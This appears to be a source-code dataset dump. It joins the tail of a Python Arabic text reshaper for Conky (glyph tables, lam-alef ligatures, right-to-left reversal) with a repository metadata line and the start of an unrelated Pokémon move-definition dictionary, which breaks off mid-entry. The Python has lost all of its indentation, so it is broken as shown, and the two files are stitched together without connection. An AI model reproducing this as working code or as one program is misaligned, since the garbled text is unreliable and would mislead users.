u'\u062D' : [u'\u062D', u'\uFEA1', u'\uFEA3', u'\uFEA4', u'\uFEA2', 4],
u'\u062E' : [u'\u062E', u'\uFEA5', u'\uFEA7', u'\uFEA8', u'\uFEA6', 4],
u'\u062F' : [u'\u062F', u'\uFEA9', u'\uFEA9', u'\uFEAA', u'\uFEAA', 2],
u'\u0630' : [u'\u0630', u'\uFEAB', u'\uFEAB', u'\uFEAC', u'\uFEAC', 2],
u'\u0631' : [u'\u0631', u'\uFEAD', u'\uFEAD', u'\uFEAE', u'\uFEAE', 2],
u'\u0632' : [u'\u0632', u'\uFEAF', u'\uFEAF', u'\uFEB0', u'\uFEB0', 2],
u'\u0633' : [u'\u0633', u'\uFEB1', u'\uFEB3', u'\uFEB4', u'\uFEB2', 4],
u'\u0634' : [u'\u0634', u'\uFEB5', u'\uFEB7', u'\uFEB8', u'\uFEB6', 4],
u'\u0635' : [u'\u0635', u'\uFEB9', u'\uFEBB', u'\uFEBC', u'\uFEBA', 4],
u'\u0636' : [u'\u0636', u'\uFEBD', u'\uFEBF', u'\uFEC0', u'\uFEBE', 4],
u'\u0637' : [u'\u0637', u'\uFEC1', u'\uFEC3', u'\uFEC4', u'\uFEC2', 4],
u'\u0638' : [u'\u0638', u'\uFEC5', u'\uFEC7', u'\uFEC8', u'\uFEC6', 4],
u'\u0639' : [u'\u0639', u'\uFEC9', u'\uFECB', u'\uFECC', u'\uFECA', 4],
u'\u063A' : [u'\u063A', u'\uFECD', u'\uFECF', u'\uFED0', u'\uFECE', 4],
u'\u0641' : [u'\u0641', u'\uFED1', u'\uFED3', u'\uFED4', u'\uFED2', 4],
u'\u0642' : [u'\u0642', u'\uFED5', u'\uFED7', u'\uFED8', u'\uFED6', 4],
u'\u0643' : [u'\u0643', u'\uFED9', u'\uFEDB', u'\uFEDC', u'\uFEDA', 4],
u'\u0644' : [u'\u0644', u'\uFEDD', u'\uFEDF', u'\uFEE0', u'\uFEDE', 4],
u'\u0645' : [u'\u0645', u'\uFEE1', u'\uFEE3', u'\uFEE4', u'\uFEE2', 4],
u'\u0646' : [u'\u0646', u'\uFEE5', u'\uFEE7', u'\uFEE8', u'\uFEE6', 4],
u'\u0647' : [u'\u0647', u'\uFEE9', u'\uFEEB', u'\uFEEC', u'\uFEEA', 4],
u'\u0648' : [u'\u0648', u'\uFEED', u'\uFEED', u'\uFEEE', u'\uFEEE', 2],
u'\u0649' : [u'\u0649', u'\uFEEF', u'\uFEEF', u'\uFEF0', u'\uFEF0', 2],
u'\u0671' : [u'\u0671', u'\u0671', u'\u0671', u'\uFB51', u'\uFB51', 2],
u'\u064A' : [u'\u064A', u'\uFEF1', u'\uFEF3', u'\uFEF4', u'\uFEF2', 4],
u'\u066E' : [u'\u066E', u'\uFBE4', u'\uFBE8', u'\uFBE9', u'\uFBE5', 4],
u'\u06AA' : [u'\u06AA', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
u'\u06C1' : [u'\u06C1', u'\uFBA6', u'\uFBA8', u'\uFBA9', u'\uFBA7', 4],
u'\u06E4' : [u'\u06E4', u'\u06E4', u'\u06E4', u'\u06E4', u'\uFEEE', 2],
u'\u067E' : [u'\u067E', u'\uFB56', u'\uFB58', u'\uFB59', u'\uFB57', 4],
u'\u0698' : [u'\u0698', u'\uFB8A', u'\uFB8A', u'\uFB8A', u'\uFB8B', 2],
u'\u06AF' : [u'\u06AF', u'\uFB92', u'\uFB94', u'\uFB95', u'\uFB93', 4],
u'\u0686' : [u'\u0686', u'\uFB7A', u'\uFB7C', u'\uFB7D', u'\uFB7B', 4],
u'\u06A9' : [u'\u06A9', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
u'\u06CC' : [u'\u06CC', u'\uFEEF', u'\uFEF3', u'\uFEF4', u'\uFEF0', 4]
}
ARABIC_GLYPHS_LIST = [
[u'\u0622', u'\uFE81', u'\uFE81', u'\uFE82', u'\uFE82', 2],
[u'\u0623', u'\uFE83', u'\uFE83', u'\uFE84', u'\uFE84', 2],
[u'\u0624', u'\uFE85', u'\uFE85', u'\uFE86', u'\uFE86', 2],
[u'\u0625', u'\uFE87', u'\uFE87', u'\uFE88', u'\uFE88', 2],
[u'\u0626', u'\uFE89', u'\uFE8B', u'\uFE8C', u'\uFE8A', 4],
[u'\u0627', u'\u0627', u'\u0627', u'\uFE8E', u'\uFE8E', 2],
[u'\u0628', u'\uFE8F', u'\uFE91', u'\uFE92', u'\uFE90', 4],
[u'\u0629', u'\uFE93', u'\uFE93', u'\uFE94', u'\uFE94', 2],
[u'\u062A', u'\uFE95', u'\uFE97', u'\uFE98', u'\uFE96', 4],
[u'\u062B', u'\uFE99', u'\uFE9B', u'\uFE9C', u'\uFE9A', 4],
[u'\u062C', u'\uFE9D', u'\uFE9F', u'\uFEA0', u'\uFE9E', 4],
[u'\u062D', u'\uFEA1', u'\uFEA3', u'\uFEA4', u'\uFEA2', 4],
[u'\u062E', u'\uFEA5', u'\uFEA7', u'\uFEA8', u'\uFEA6', 4],
[u'\u062F', u'\uFEA9', u'\uFEA9', u'\uFEAA', u'\uFEAA', 2],
[u'\u0630', u'\uFEAB', u'\uFEAB', u'\uFEAC', u'\uFEAC', 2],
[u'\u0631', u'\uFEAD', u'\uFEAD', u'\uFEAE', u'\uFEAE', 2],
[u'\u0632', u'\uFEAF', u'\uFEAF', u'\uFEB0', u'\uFEB0', 2],
[u'\u0633', u'\uFEB1', u'\uFEB3', u'\uFEB4', u'\uFEB2', 4],
[u'\u0634', u'\uFEB5', u'\uFEB7', u'\uFEB8', u'\uFEB6', 4],
[u'\u0635', u'\uFEB9', u'\uFEBB', u'\uFEBC', u'\uFEBA', 4],
[u'\u0636', u'\uFEBD', u'\uFEBF', u'\uFEC0', u'\uFEBE', 4],
[u'\u0637', u'\uFEC1', u'\uFEC3', u'\uFEC4', u'\uFEC2', 4],
[u'\u0638', u'\uFEC5', u'\uFEC7', u'\uFEC8', u'\uFEC6', 4],
[u'\u0639', u'\uFEC9', u'\uFECB', u'\uFECC', u'\uFECA', 4],
[u'\u063A', u'\uFECD', u'\uFECF', u'\uFED0', u'\uFECE', 4],
[u'\u0641', u'\uFED1', u'\uFED3', u'\uFED4', u'\uFED2', 4],
[u'\u0642', u'\uFED5', u'\uFED7', u'\uFED8', u'\uFED6', 4],
[u'\u0643', u'\uFED9', u'\uFEDB', u'\uFEDC', u'\uFEDA', 4],
[u'\u0644', u'\uFEDD', u'\uFEDF', u'\uFEE0', u'\uFEDE', 4],
[u'\u0645', u'\uFEE1', u'\uFEE3', u'\uFEE4', u'\uFEE2', 4],
[u'\u0646', u'\uFEE5', u'\uFEE7', u'\uFEE8', u'\uFEE6', 4],
[u'\u0647', u'\uFEE9', u'\uFEEB', u'\uFEEC', u'\uFEEA', 4],
[u'\u0648', u'\uFEED', u'\uFEED', u'\uFEEE', u'\uFEEE', 2],
[u'\u0649', u'\uFEEF', u'\uFEEF', u'\uFEF0', u'\uFEF0', 2],
[u'\u0671', u'\u0671', u'\u0671', u'\uFB51', u'\uFB51', 2],
[u'\u064A', u'\uFEF1', u'\uFEF3', u'\uFEF4', u'\uFEF2', 4],
[u'\u066E', u'\uFBE4', u'\uFBE8', u'\uFBE9', u'\uFBE5', 4],
[u'\u06AA', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
[u'\u06C1', u'\uFBA6', u'\uFBA8', u'\uFBA9', u'\uFBA7', 4],
[u'\u067E', u'\uFB56', u'\uFB58', u'\uFB59', u'\uFB57', 4],
[u'\u0698', u'\uFB8A', u'\uFB8A', u'\uFB8A', u'\uFB8B', 2],
[u'\u06AF', u'\uFB92', u'\uFB94', u'\uFB95', u'\uFB93', 4],
[u'\u0686', u'\uFB7A', u'\uFB7C', u'\uFB7D', u'\uFB7B', 4],
[u'\u06A9', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
[u'\u06CC', u'\uFEEF', u'\uFEF3', u'\uFEF4', u'\uFEF0', 4]
]
def get_reshaped_glyph(target, location):
if target in ARABIC_GLYPHS:
return ARABIC_GLYPHS[target][location]
else:
return target
def get_glyph_type(target):
if target in ARABIC_GLYPHS:
return ARABIC_GLYPHS[target][5]
else:
return 2
def is_haraka(target):
return target in HARAKAT
def replace_jalalah(unshaped_word):
return re.sub(u'^\u0627\u0644\u0644\u0647$', u'\uFDF2', unshaped_word)
def replace_lam_alef(unshaped_word):
list_word = list(unshaped_word)
letter_before = u''
for i in range(len(unshaped_word)):
if not is_haraka(unshaped_word[i]) and unshaped_word[i] != DEFINED_CHARACTERS_ORGINAL_LAM:
letter_before = unshaped_word[i]
if unshaped_word[i] == DEFINED_CHARACTERS_ORGINAL_LAM:
candidate_lam = unshaped_word[i]
lam_position = i
haraka_position = i + 1
while haraka_position < len(unshaped_word) and is_haraka(unshaped_word[haraka_position]):
haraka_position += 1
if haraka_position < len(unshaped_word):
if lam_position > 0 and get_glyph_type(letter_before) > 2:
lam_alef = get_lam_alef(list_word[haraka_position], candidate_lam, False)
else:
lam_alef = get_lam_alef(list_word[haraka_position], candidate_lam, True)
if lam_alef != '':
list_word[lam_position] = lam_alef
list_word[haraka_position] = u' '
return u''.join(list_word).replace(u' ', u'')
def get_lam_alef(candidate_alef, candidate_lam, is_end_of_word):
shift_rate = 1
reshaped_lam_alef = u''
if is_end_of_word:
shift_rate += 1
if DEFINED_CHARACTERS_ORGINAL_LAM == candidate_lam:
if DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_MDD == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[0][shift_rate]
if DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_HAMAZA == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[1][shift_rate]
if DEFINED_CHARACTERS_ORGINAL_ALF == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[2][shift_rate]
if DEFINED_CHARACTERS_ORGINAL_ALF_LOWER_HAMAZA == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[3][shift_rate]
return reshaped_lam_alef
class DecomposedWord(object):
def __init__(self, word):
self.stripped_harakat = []
self.harakat_positions = []
self.stripped_regular_letters = []
self.letters_position = []
for i in range(len(word)):
c = word[i]
if is_haraka(c):
self.harakat_positions.append(i)
self.stripped_harakat.append(c)
else:
self.letters_position.append(i)
self.stripped_regular_letters.append(c)
def reconstruct_word(self, reshaped_word):
l = list(u'\0' * (len(self.stripped_harakat) + len(reshaped_word)))
for i in range(len(self.letters_position)):
l[self.letters_position[i]] = reshaped_word[i]
for i in range(len(self.harakat_positions)):
l[self.harakat_positions[i]] = self.stripped_harakat[i]
return u''.join(l)
def get_reshaped_word(unshaped_word):
unshaped_word = replace_jalalah(unshaped_word)
unshaped_word = replace_lam_alef(unshaped_word)
decomposed_word = DecomposedWord(unshaped_word)
result = u''
if decomposed_word.stripped_regular_letters:
result = reshape_it(u''.join(decomposed_word.stripped_regular_letters))
return decomposed_word.reconstruct_word(result)
def reshape_it(unshaped_word):
if not unshaped_word:
return u''
if len(unshaped_word) == 1:
return get_reshaped_glyph(unshaped_word[0], 1)
reshaped_word = []
for i in range(len(unshaped_word)):
before = False
after = False
if i == 0:
after = get_glyph_type(unshaped_word[i]) == 4
elif i == len(unshaped_word) - 1:
before = get_glyph_type(unshaped_word[i - 1]) == 4
else:
after = get_glyph_type(unshaped_word[i]) == 4
before = get_glyph_type(unshaped_word[i - 1]) == 4
if after and before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 3))
elif after and not before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 2))
elif not after and before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 4))
elif not after and not before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 1))
return u''.join(reshaped_word)
def is_arabic_character(target):
return target in ARABIC_GLYPHS or target in HARAKAT
def get_words(sentence):
if sentence:
return re.split('\\s', sentence)
return []
def has_arabic_letters(word):
for c in word:
if is_arabic_character(c):
return True
return False
def is_arabic_word(word):
for c in word:
if not is_arabic_character(c):
return False
return True
def get_words_from_mixed_word(word):
temp_word = u''
words = []
for c in word:
if is_arabic_character(c):
if temp_word and not is_arabic_word(temp_word):
words.append(temp_word)
temp_word = c
else:
temp_word += c
else:
if temp_word and is_arabic_word(temp_word):
words.append(temp_word)
temp_word = c
else:
temp_word += c
if temp_word:
words.append(temp_word)
return words
def reshape(text):
if text:
lines = re.split('\\r?\\n', text)
for i in range(len(lines)):
lines[i] = reshape_sentence(lines[i])
return u'\n'.join(lines)
return u''
def reshape_sentence(sentence):
words = get_words(sentence)
for i in range(len(words)):
word = words[i]
RTL = ""
if has_arabic_letters(word):
if is_arabic_word(word):
words[i] = get_reshaped_word(word)
else:
mixed_words = get_words_from_mixed_word(word)
for j in range(len(mixed_words)):
mixed_words[j] = get_reshaped_word(mixed_words[j])
words[i] = u''.join(mixed_words)
for letter in u' '.join(words):
RTL= letter + RTL
return RTL
|
faisal-oead/conky-arabic-support
|
conkyar/arabic_reshaper.py
|
Python
|
gpl-2.0
| 13,842
|
[
"VisIt"
] |
5946efabd65c3e1e11945f0af410f9dd63f33c4f567ab4deb0986b4962c066c6
|
from moves import DamagingMove
from moves import Move
from moves import BoostingMove
from moves import HealingMove
from handlers import *
moves = {
"Noop": Move("Noop"),
"Absorb": DamagingMove("Absorb",
power=20,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Acid": DamagingMove("Acid",
power=40,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Acid Armor": BoostingMove("Acid Armor",
category="Non-Damaging",
type="Poison",
boosts={
'pdef': 2
}
),
"Acid Spray": DamagingMove("Acid Spray",
power=40,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Acrobatics": DamagingMove("Acrobatics",
power=55,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Acupressure": Move("Acupressure",
category="Non-Damaging",
type="Normal"),
"Aerial Ace": DamagingMove("Aerial Ace",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=0.000000),
"Aeroblast": DamagingMove("Aeroblast",
power=100,
category="Special",
priority=0,
type="Flying",
accuracy=0.950000),
"After You": Move("After You",
category="Non-Damaging",
type="Normal"),
"Agility": BoostingMove("Agility",
category="Non-Damaging",
type="Psychic",
boosts={
'spe': 2
}),
"Air Cutter": DamagingMove("Air Cutter",
power=60,
category="Special",
priority=0,
type="Flying",
accuracy=0.950000),
"Air Slash": DamagingMove("Air Slash",
power=75,
category="Special",
priority=0,
type="Flying",
accuracy=0.950000),
"Ally Switch": Move("Ally Switch",
category="Non-Damaging",
type="Psychic"),
"Amnesia": BoostingMove("Amnesia",
category="Non-Damaging",
type="Psychic",
boosts={
'spdef': 2
}),
"Ancient Power": DamagingMove("Ancient Power",
power=60,
category="Special",
priority=0,
type="Rock",
accuracy=1.000000),
"Aqua Jet": DamagingMove("Aqua Jet",
power=40,
category="Physical",
priority=1,
type="Water",
accuracy=1.000000),
"Aqua Ring": Move("Aqua Ring",
category="Non-Damaging",
type="Water"),
"Aqua Tail": DamagingMove("Aqua Tail",
power=90,
category="Physical",
priority=0,
type="Water",
accuracy=0.900000),
"Arm Thrust": DamagingMove("Arm Thrust",
power=15,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Aromatherapy": Move("Aromatherapy",
category="Non-Damaging",
type="Grass",
handler=handle_aromatherapy),
"Aromatic Mist": Move("Aromatic Mist",
category="Non-Damaging",
type="Fairy"),
"Assist": Move("Assist",
category="Non-Damaging",
type="Normal"),
"Assurance": DamagingMove("Assurance",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Astonish": DamagingMove("Astonish",
power=30,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Attack Order": DamagingMove("Attack Order",
power=90,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Attract": Move("Attract",
category="Non-Damaging",
type="Normal"),
"Aura Sphere": DamagingMove("Aura Sphere",
power=80,
category="Special",
priority=0,
type="Fighting",
accuracy=0.000000),
"Aurora Beam": DamagingMove("Aurora Beam",
power=65,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Autotomize": BoostingMove("Autotomize",
category="Non-Damaging",
type="Steel",
boosts={
'spe': 2
}
),
"Avalanche": DamagingMove("Avalanche",
power=60,
category="Physical",
priority=-4,
type="Ice",
accuracy=1.000000),
"Baby-Doll Eyes": Move("Baby-Doll Eyes",
category="Non-Damaging",
type="Fairy"),
"Barrage": DamagingMove("Barrage",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Barrier": BoostingMove("Barrier",
category="Non-Damaging",
type="Psychic",
boosts={
'pdef': 2
}),
"Baton Pass": Move("Baton Pass",
category="Non-Damaging",
type="Normal"),
"Beat Up": DamagingMove("Beat Up",
power=0,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Belch": DamagingMove("Belch",
power=120,
category="Special",
priority=0,
type="Poison",
accuracy=0.900000),
"Belly Drum": Move("Belly Drum",
category="Non-Damaging",
type="Normal"),
"Bestow": Move("Bestow",
category="Non-Damaging",
type="Normal"),
"Bide": DamagingMove("Bide",
power=0,
category="Physical",
priority=1,
type="Normal",
accuracy=0.000000),
"Bind": DamagingMove("Bind",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Bite": DamagingMove("Bite",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Blast Burn": DamagingMove("Blast Burn",
power=150,
category="Special",
priority=0,
type="Fire",
accuracy=0.900000),
"Blaze Kick": DamagingMove("Blaze Kick",
power=85,
category="Physical",
priority=0,
type="Fire",
accuracy=0.900000),
"Blizzard": DamagingMove("Blizzard",
power=110,
category="Special",
priority=0,
type="Ice",
accuracy=0.700000),
"Block": Move("Block",
category="Non-Damaging",
type="Normal"),
"Blue Flare": DamagingMove("Blue Flare",
power=130,
category="Special",
priority=0,
type="Fire",
accuracy=0.850000),
"Body Slam": DamagingMove("Body Slam",
power=85,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Bolt Strike": DamagingMove("Bolt Strike",
power=130,
category="Physical",
priority=0,
type="Electric",
accuracy=0.850000),
"Bone Club": DamagingMove("Bone Club",
power=65,
category="Physical",
priority=0,
type="Ground",
accuracy=0.850000),
"Bone Rush": DamagingMove("Bone Rush",
power=25,
category="Physical",
priority=0,
type="Ground",
accuracy=0.800000),
"Bonemerang": DamagingMove("Bonemerang",
power=50,
category="Physical",
priority=0,
type="Ground",
accuracy=0.900000),
"Boomburst": DamagingMove("Boomburst",
power=140,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Bounce": DamagingMove("Bounce",
power=85,
category="Physical",
priority=0,
type="Flying",
accuracy=0.850000),
"Brave Bird": DamagingMove("Brave Bird",
power=120,
category="Physical",
priority=0,
type="Flying",
handler=handle_brave_bird,
accuracy=1.000000),
"Brick Break": DamagingMove("Brick Break",
power=75,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Brine": DamagingMove("Brine",
power=65,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Bubble": DamagingMove("Bubble",
power=40,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Bubble Beam": DamagingMove("Bubble Beam",
power=65,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Bug Bite": DamagingMove("Bug Bite",
power=60,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Bug Buzz": DamagingMove("Bug Buzz",
power=90,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Bulk Up": BoostingMove("Bulk Up",
category="Non-Damaging",
type="Fighting",
boosts={
'patk': 1,
'pdef': 1
}),
"Bulldoze": DamagingMove("Bulldoze",
power=60,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Bullet Punch": DamagingMove("Bullet Punch",
power=40,
category="Physical",
priority=1,
type="Steel",
accuracy=1.000000),
"Bullet Seed": DamagingMove("Bullet Seed",
power=25 * 1.5 * 3,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Calm Mind": BoostingMove("Calm Mind",
category="Non-Damaging",
type="Psychic",
boosts={
'spatk': 1,
'spdef': 1
}),
"Camouflage": Move("Camouflage",
category="Non-Damaging",
type="Normal"),
"Captivate": Move("Captivate",
category="Non-Damaging",
type="Normal"),
"Celebrate": Move("Celebrate",
category="Non-Damaging",
type="Normal"),
"Charge": Move("Charge",
category="Non-Damaging",
type="Electric"),
"Charge Beam": DamagingMove("Charge Beam",
power=50,
category="Special",
priority=0,
type="Electric",
accuracy=0.900000),
"Charm": Move("Charm",
category="Non-Damaging",
type="Fairy"),
"Chatter": DamagingMove("Chatter",
power=65,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Chip Away": DamagingMove("Chip Away",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Circle Throw": DamagingMove("Circle Throw",
power=60,
category="Physical",
priority=-6,
type="Fighting",
accuracy=0.900000),
"Clamp": DamagingMove("Clamp",
power=35,
category="Physical",
priority=0,
type="Water",
accuracy=0.850000),
"Clear Smog": DamagingMove("Clear Smog",
power=50,
category="Special",
priority=0,
type="Poison",
accuracy=0.000000),
"Close Combat": DamagingMove("Close Combat",
power=120,
category="Physical",
priority=0,
type="Fighting",
handler=handle_close_combat,
accuracy=1.000000),
"Coil": BoostingMove("Coil",
category="Non-Damaging",
type="Poison",
boosts={
'patk': 1,
'pdef': 1,
'acc': 1
}),
"Comet Punch": DamagingMove("Comet Punch",
power=18,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Confide": Move("Confide",
category="Non-Damaging",
type="Normal"),
"Confuse Ray": Move("Confuse Ray",
category="Non-Damaging",
type="Ghost"),
"Confusion": DamagingMove("Confusion",
power=50,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Constrict": DamagingMove("Constrict",
power=10,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Conversion": Move("Conversion",
category="Non-Damaging",
type="Normal"),
"Conversion 2": Move("Conversion 2",
category="Non-Damaging",
type="Normal"),
"Copycat": Move("Copycat",
category="Non-Damaging",
type="Normal"),
"Cosmic Power": BoostingMove("Cosmic Power",
category="Non-Damaging",
type="Psychic",
boosts={
'pdef': 1,
'spdef': 1
}),
"Cotton Guard": BoostingMove("Cotton Guard",
category="Non-Damaging",
type="Grass",
boosts={
'pdef': 3
}),
"Cotton Spore": Move("Cotton Spore",
category="Non-Damaging",
type="Grass"),
"Counter": DamagingMove("Counter",
power=0,
category="Physical",
priority=-5,
type="Fighting",
accuracy=1.000000),
"Covet": DamagingMove("Covet",
power=60,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Crabhammer": DamagingMove("Crabhammer",
power=100,
category="Physical",
priority=0,
type="Water",
accuracy=0.900000),
"Crafty Shield": Move("Crafty Shield",
category="Non-Damaging",
type="Fairy"),
"Cross Chop": DamagingMove("Cross Chop",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.800000),
"Cross Poison": DamagingMove("Cross Poison",
power=70,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Crunch": DamagingMove("Crunch",
power=80,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Crush Claw": DamagingMove("Crush Claw",
power=75,
category="Physical",
priority=0,
type="Normal",
accuracy=0.950000),
"Crush Grip": DamagingMove("Crush Grip",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Curse": Move("Curse",
category="Non-Damaging",
type="Ghost"),
"Cut": DamagingMove("Cut",
power=50,
category="Physical",
priority=0,
type="Normal",
accuracy=0.950000),
"Dark Pulse": DamagingMove("Dark Pulse",
power=80,
category="Special",
priority=0,
type="Dark",
accuracy=1.000000),
"Dark Void": Move("Dark Void",
category="Non-Damaging",
type="Dark"),
"Dazzling Gleam": DamagingMove("Dazzling Gleam",
power=80,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Defend Order": BoostingMove("Defend Order",
category="Non-Damaging",
type="Bug",
boosts={
'pdef': 1,
'spdef': 1
}),
"Defense Curl": BoostingMove("Defense Curl",
category="Non-Damaging",
type="Normal",
boosts={
'pdef': 1
}),
"Defog": Move("Defog",
category="Non-Damaging",
type="Flying",
handler=handle_defog),
"Destiny Bond": Move("Destiny Bond",
category="Non-Damaging",
type="Ghost"),
"Detect": Move("Detect",
category="Non-Damaging",
type="Fighting"),
"Diamond Storm": DamagingMove("Diamond Storm",
power=100,
category="Physical",
priority=0,
type="Rock",
accuracy=0.950000),
"Dig": DamagingMove("Dig",
power=80,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Disable": Move("Disable",
category="Non-Damaging",
type="Normal"),
"Disarming Voice": DamagingMove("Disarming Voice",
power=40,
category="Special",
priority=0,
type="Fairy",
accuracy=0.000000),
"Discharge": DamagingMove("Discharge",
power=80,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Dive": DamagingMove("Dive",
power=80,
category="Physical",
priority=0,
type="Water",
accuracy=1.000000),
"Dizzy Punch": DamagingMove("Dizzy Punch",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Doom Desire": DamagingMove("Doom Desire",
power=140,
category="Special",
priority=0,
type="Steel",
accuracy=1.000000),
"Double Hit": DamagingMove("Double Hit",
power=35,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Double Kick": DamagingMove("Double Kick",
power=30,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Double Slap": DamagingMove("Double Slap",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Double Team": BoostingMove("Double Team",
category="Non-Damaging",
type="Normal",
boosts={
'eva': 1
}),
"Double-Edge": DamagingMove("Double-Edge",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Draco Meteor": DamagingMove("Draco Meteor",
power=130,
category="Special",
priority=0,
type="Dragon",
handler=handle_draco_meteor,
accuracy=0.900000),
"Dragon Ascent": DamagingMove("Dragon Ascent",
power=120,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Dragon Breath": DamagingMove("Dragon Breath",
power=60,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Claw": DamagingMove("Dragon Claw",
power=80,
category="Physical",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Dance": BoostingMove("Dragon Dance",
category="Non-Damaging",
type="Dragon",
boosts={
'patk': 1,
'spe': 1
}),
"Dragon Pulse": DamagingMove("Dragon Pulse",
power=85,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Rage": DamagingMove("Dragon Rage",
power=0,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Rush": DamagingMove("Dragon Rush",
power=100,
category="Physical",
priority=0,
type="Dragon",
accuracy=0.750000),
"Dragon Tail": DamagingMove("Dragon Tail",
power=60,
category="Physical",
priority=-6,
type="Dragon",
accuracy=0.900000),
"Drain Punch": DamagingMove("Drain Punch",
power=75,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Draining Kiss": DamagingMove("Draining Kiss",
power=50,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Dream Eater": DamagingMove("Dream Eater",
power=100,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Drill Peck": DamagingMove("Drill Peck",
power=80,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Drill Run": DamagingMove("Drill Run",
power=80,
category="Physical",
priority=0,
type="Ground",
accuracy=0.950000),
"Dual Chop": DamagingMove("Dual Chop",
power=40,
category="Physical",
priority=0,
type="Dragon",
accuracy=0.900000),
"Dynamic Punch": DamagingMove("Dynamic Punch",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.500000),
"Earth Power": DamagingMove("Earth Power",
power=90,
category="Special",
priority=0,
type="Ground",
accuracy=1.000000),
"Earthquake": DamagingMove("Earthquake",
power=100,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Echoed Voice": DamagingMove("Echoed Voice",
power=40,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Eerie Impulse": Move("Eerie Impulse",
category="Non-Damaging",
type="Electric"),
"Egg Bomb": DamagingMove("Egg Bomb",
power=100,
category="Physical",
priority=0,
type="Normal",
accuracy=0.750000),
"Electric Terrain": Move("Electric Terrain",
category="Non-Damaging",
type="Electric"),
"Electrify": Move("Electrify",
category="Non-Damaging",
type="Electric"),
"Electro Ball": DamagingMove("Electro Ball",
power=0,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Electroweb": DamagingMove("Electroweb",
power=55,
category="Special",
priority=0,
type="Electric",
accuracy=0.950000),
"Embargo": Move("Embargo",
category="Non-Damaging",
type="Dark"),
"Ember": DamagingMove("Ember",
power=40,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Encore": Move("Encore",
category="Non-Damaging",
type="Normal"),
"Endeavor": DamagingMove("Endeavor",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000,
handler=handle_endeavor),
"Endure": Move("Endure",
category="Non-Damaging",
type="Normal"),
"Energy Ball": DamagingMove("Energy Ball",
power=90,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Entrainment": Move("Entrainment",
category="Non-Damaging",
type="Normal"),
"Eruption": DamagingMove("Eruption",
power=150,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Explosion": DamagingMove("Explosion",
power=250,
category="Physical",
priority=0,
type="Normal",
